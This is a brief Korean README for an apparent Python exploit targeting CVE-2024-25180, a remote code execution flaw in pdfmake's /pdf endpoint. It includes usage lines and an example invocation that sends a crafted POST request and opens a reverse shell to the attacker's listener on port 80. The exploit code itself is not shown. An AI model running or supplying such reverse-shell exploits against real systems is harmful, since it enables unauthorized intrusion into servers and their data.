
CVE-2024-25180을 위한 Python 익스플로잇 스크립트, pdfmake의 원격 코드 실행 취약점으로, 조작된 POST 요청을 통해 리버스 셸을 전달합니다.
pdfmake는 순수 JavaScript 기반의 클라이언트/서버 PDF 인쇄 도구입니다. 이 패키지의 영향을 받는 버전은 임의 코드 삽입 공격에 취약하여, 공격자가 /pdf 경로로 조작된 POST 요청을 전송해 임의 코드를 실행할 수 있습니다. 공격자는 조작된 요청을 전송하여 시스템에서 임의 코드를 실행할 수 있습니다.
CVE-2024-25180 Remote Code Execution in pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
80번 포트에서 수신 대기하면 리버스 셸을 획득할 수 있습니다.
